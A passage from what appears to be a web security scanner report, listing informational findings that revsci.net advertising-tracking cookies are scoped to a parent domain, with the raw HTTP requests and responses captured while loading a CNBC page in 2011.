AXq6Fi6qPXByDUGB5KWmlBHQ7vbFgLuZcVnjxVDoD1PfgEVrqBxlegtsb4cvTtN79xGqWBcBFfUnIQ5v0qLTsnUcZrCriEizeOrVC72DpHikTS7/Lwwrw2F8M3JJULIyAB+EeLAGRszMBbJsxuuw5QwjiLtr9LX2rGSFQVQtNim7CbhR8dX05UqQqCFWZ/9ja4z388/+IiuuP2ld6sBhkl4QIGuzEKD0CxcldXbRWThqVdia+3QaaNwBZyH5skdxaV16qXzeDqxLaUQZN2ONzEYL96zeDQX4SzNB+jvaAiV0lhhKFVQ2CS4T0iS3nDzCTxHpPHxiqN5hnSdw4r1F5dhCdf6NiKtQlyHPzAqE4KetJPB/rPbDKotoUNb5"; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emplIK5OA0K0CDh5dF9afPJSfPaj6XcBmorHEc/TIHBCVRVSZrobvtLMxEgZPYynL0er8BWtYtV0dJ53KZo9p/px9SgRp/FzXhLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXCa526djlE801fgUQBozQLnN1pbn0BVzaKGWpJbKR4+rCv9Jg3W1uFamSDB2LvfO3AGknsFo4m2KveUb/s+WX8POygM9poFg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7U1qHNUdlHLPM5AqF7BNa0pYflQcV79fjL0tuNsq1PBC4dQFP7CuHjAC6pOp24XOz79cZhArDSL9bvUudrTRvEIroA4NCzad0MsU2sXKSNtkRN4Gq5YX61eq3sz4DxD58sbq+VGlvjNo1C2NsLJvYHpIaxKEcAVCfYNFuiJW9Ld6LCksMDycjv5iOP60aUROV32LGj6skxKEfVMjClll66J4IEP/xpmdrbkw2u1kTEZnZn+uDtlgoahVnyL84qaC73ti4HPMP6DDXwgyzvy3zXjb9F8x4cUAH+mu25iz/7xFtrTMDRXohiE7z0OhT3yWVMDmAvayqLMJWypL5ig0W+H0hIkdRrpoDA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:42:57 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:42:56 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.188. http://pix04.revsci.net/I10985/b3/0/3/1008211/750853358.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/750853358.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpE9zg2XM99W8hh7D7TE48BgWgC2jH6DE8lPJ46nSAf8HexFSelZEk/128ANX9NGypaAj1dgReFoR/1inB9lkygaVMIuoUXY9UyLxLUJcdgb+/7pVB0HuGhRq0W0NN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:30:28 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/750853358.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_rXrw="MLsXtSMNJjhvJZH0ecXcxPALFPJgPeDEnB2qzoP9NPmW+Qk/VjEpNZvXbTc7xC8rSTKo6YlN1SJ6IV+6n10UiflLT2U8DIkhgrRujkmidgtDOR+4Q3LOg4jRqBraX7I4lUnuuh2VZdVC6U+2Iyfb4lspwfQ0Qc20UfAyscwo0l2GEtXUl4EJWDD16qFPvl119Mgo5ofu/wqj7Z02Y82eC2LmbMz+cBnAzqg1R18R22GcoCkmhI0SP5dhVps5CaA13a6mKgKSI2X0i6F0up+rLEr0pDm9kGRcBr+RdSyD+Hi6yNrz9lgFxkej1o7eQXaI6D6u0i5yRXvRnUk5ux5Sbuyz6eUkf+YTmYDEXPdThIupK2KEWalXyRmNOibvC5VfhK2hA22JFU9c7O6hO220BkhGubV6+GHBAmFykbN8p8H6AuAz75dBLFSQuRp1KNsLObVINXHTVx7hNbJp+G3bpTNsVN8VcDh3OwC+6KYVtZPgCqLz0H9l+IzJBLmTVuwywzI1YTrITixOlx175MpOf1qPPcn7gE74t9C+lJN4GN5jE8E/rXCAWkZWxum22CBUg+63oWizvS4AzdSm5l382GDUznpdteV4SrXR4AfFxtd2Tr7d4wbT3RpMe1TJTI83/TeDNTU6ufYEt+Vifw82Ykg0bF6O127MBBKiZmUH2zNQvsw5zDRnXsNmSujeoaHMRuRStRgS+O7Il+58ypddeRoTipYotN2qb/IQ0bmhGl/GZh39NIwjjCGKNBaIpj2pO9nENLUfsKacunuaNcefmki1l7nhYVTQfxs/3X8bv49my2v4Gtijya2Ev9jdgpLXdgpulIHA/a1hB6aGvm+/4xIR1B4/5YfSbBt2nnSYCg7791UoE+tl/3si+KgF61MfKNoLsLjxam8UB6s0eSwxUpEjUL/0YcM6ANpyG/7D3ZOYxI8Um4WymefTwbGSK625iK04nUTEI3evisO8xqhG+04Bl6Pc1kDAWQj9TGlKto6qyks9RBnUXNkWqpIpmn3OnOeAmQPGkZDuyJelEmJo8iSHyWNW/ewUvXaI5UAy8lN8N3V2heRyLeJFCv5srRfg8GmSwT3ZFKDV+mM1A5qGt/9jEbJZdP+WiK7+hW3L8E0hw8V7DOTr7T8rTfWpW8PQC5r8XefiDU8rHLBcE+J11xcyWfPzKTl9KYwcpcGN6fgwttoSmY3H4WGzvZ/hJqJP5m1KIACnfHoreHZTermSCIXuyOZxY7GxIrAQSm/tNkQs8lzj8HZOI+/Hzsmyn71ZO54R6h1iFUt6MWBd1H7/4zJ8veouCtKTAU0QzuQUdOHILb8nfaQvCL6FKrqrWs7LTWP6g6tdlXGfXB3KrgfiXN1vv8mXaA=="; rsi_us_1000000="pUMN4y+jOBYULQE0ur/TotBv0OXJiczDnb++8r/x9aZAxBCInYEZ/jMMNxtAxH0lsZ65lpt0Uj/e/FhK5A3TVn25DJtll/rGMjGkjVOUOed2RdW7jxad/LZqAIjd76eKMUJYJx5w+AglsacGy3S1OjAJnwO6Bvqk7yreLcKD++pKszo4LrUHCWE0l3Tjs6l1qsxjKUUx5QX1pZfG6XujimGDCELB57M6RZSXrZxkh/V96AjnGXiXf2iO7d87D8eaNOfPoYSqJqxQii/bSRqpkRFNV8KPAadn1owdPYofYRetaTA+TVSdGWqm+rnv8cusKMVrNA9oqDse9pvsIVWMhgIS48okikmUltNzr5FEQJqvkrrXuHtNye5fmS5wTorciWRsLTecMAyjm9/hcOetLrZcllINKJPP6fFsT8bRLAOr2Dzp2iE6KIOfXr9IJHFiEGJQu6UcvEK81mWKLuz14aVAdkloF7hua2pV0w2mbmpn+dukbYu9d3gUE4u7xEPPylvCtamrolKpLihub9ncI141FCRZeqbMDz63DyTvA0KPo68zEtHUs5+FRQiiQFTpuY414uDqTXQ8l9d61NLhvW/DK0LoeLw4/UtGUETyHQ4rB+sKkI5RcdwYkvL+DDKbTvBIntjIUwbdRvhKTPAbzoCHwUqcFI5LKcftxNV6zoQ2In2Roqi5pY680HvQHWMUBKFRsWa73HXdedSeG6+O6XX3t/L3oQQR2gioVx47bFRhUr5k+Rm7FLCPPEjuacXBGecjdP1WcwqLwvZ4PmwBrtj+Ak44mvQODzjCEGoN1IgI/UfdoflbIO+gADtcJogX8RRqMXd+y5djnhq3+lJoWsTFDJN/DhNJ8wAZsEVPnVurQTNCcGmoZ0CZ840MkjKzYThMruKwXtIidIlM1mYqEoNrlXwcVM8JaD8Dk46/l8KoDv2czl+OVEZAuQbO5t+mA5RQ4Eml9ZKj80yHLv4jjK7zYue58cRxsFWLS3PfS89HIK5eFVRCWpt4egQnLvxi24TgibGs4KUhPUcKGEw8Ao3j7NlDHTTzLdhaiUBl/sppgnT5E9FCQA9716J36SeLwKA4bi1abmF7FBaJrRZVuai/JJIt7uzE3VbdYpYoA9pTHboU4Pivfs/6egAUwcCMhq1FfujoLS9m6tqwCtzFaHIhp70DkIBos4MT+tqZsp3llxZCj3bLYE9VLNQlNjSvXmKalIhJE4m2gcCixhfUEWKRDif2j6VpcxxGzelaaiUKZyOW2QQqVb2ogoDiCJKXUaWT4FJN6y1g8F+vgiAP+K8V1mVKNJ3FdgrF9mlrS7rc6j7yXQtSD9Q2Ryn2GcMJtsaHTqNgo18cip0oiC1T4+ZEQUbPpRFNHAo8rHAwxAflXclUC3bYUNiIrovxdnOVMbp1SnOv2R5cXcfp+IieM52iJDyoPO0gAbhGxhdO7Rf8E3DfCfjiKYGKIaxye4DlsqJ/1xGqWHveSgpxWfHLTNWQ/twJn2KuUPG3eMqO8FTbmDynIpuhtLaZPGDXV9xcEZMuoTYtWzAtZELONTTtosP4BznxD0f0CmJzXOhPWyzp4iyrrUCFAFXgPJ4cfHMeFOwP+gkNQ0mGvMxraeDAtUytk45JzPMKSho4A2F7zt2D9GjriJdYjFUX0wHuDwx5rrRhgOufmkiyNX5UsBxI17yfsPBgf8nJSDkP2hyFWoTtHmGJNOtU/bvW+ojwJfL2ezmtW5npyyPostAyx6IHhzkNbQmHtA+Uf43Gh7/ET6/+p0BrJr6M+VT6XvuglZzDeg=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMILkXX87wNisncWnpIsxA4nKqLOnUTLU4fKuzUz/xw+ppzycr5wS4UUa4TNPNBPv1QWh+g6q+yaI0bhVeI0CXlkl1/Rq1pruAxHphJsEataiCc4UsktlzVfsKfbGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdrai8EDZe5QGsJaR2lbzBppIqOW4sghTvfDbBz9w6xOnT6rKWeoL4o7hjL6yZJnvXVE/sak4VW1rqOxEh4TkVZM7XJOhI5m6HfAWXymnnUAo9aWkAoQvi5fzuu/5IM3sjayyH92rLq5JofqkYphEIniTb2hyI5X/Mrs5bXl31qB66CbT6kPzZvmfKPy95K8ih9mXMMCtdrIvcMnFveZk4Z49MsYR7w1LbcvxOGwhkZ/L92bTvudQtQPxONyOZ7HikgclZLZy2xO3xG7Upd+xms49rIJRVZG+v51ibfNc58By9TrOIT8dKLGhmr5HzsZjIBlFrmqZlVvF9SExEukMIM6ZlirkNKP3x+tFpAHmews4OYkArlVoW0wJ53ynj+XqNKEdptLUI34ITZ0h4nE6llLOP1i4Yl3NCpoDiwg840BVIvH9r/iyhwCfr+zOeTH02taVMYplBo=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpE9zg2XM99W8hh7D7TE48BgWgC2jH6DE8lPJ46nSAf8HexFSelZEk/128ANX9NGypaAj1dgReFoR/1inB9lkygaVMIuoUXY9UyLxLUJcdgb+/7pVB0HuGhRq0W0NN8=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:30:28 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:30:27 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.189. http://pix04.revsci.net/I10985/b3/0/3/1008211/759659174.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/759659174.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU4gSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoEridsU/hQklS2zn/pSli2Rtkys7Cu8F3vwD23Ocs5M84e0l41ypjZYa9NNMjP/hg2a3P12VkLJJJbFyyvvcQ5CQO2cz4UB2K2EQhvUfC08cNafWRTmSV2FwxnXs29jI+nkMU8QmD0Bw1ao85QIlZkQZOLlk8uZWjFC67AWXT7UY7ZfMhzB3jROUkKH71DeERmutZ0nwCpSMd1gSceTdwz3s/hdPZOKqyKJC4V5f1N/ueW59kACHLWrA+OydZDjZS9CIFnDETP3cdmwWlQPRzO+JjeN8UGRBRTjLTQMJBSEhb3PpNUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQsSUoLnATqy/tiKdn75egfCW6fd5NtGZUI+/7w3o0IhSHSQw8NLNwy4LRWKIS+7LyZ9TiE7e99bDIy6bGQBwxkT6ha/M3fu5OW8n0Io1Z0J+sMQ+tZ6lcs2ZkNNg=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:31:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/759659174.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
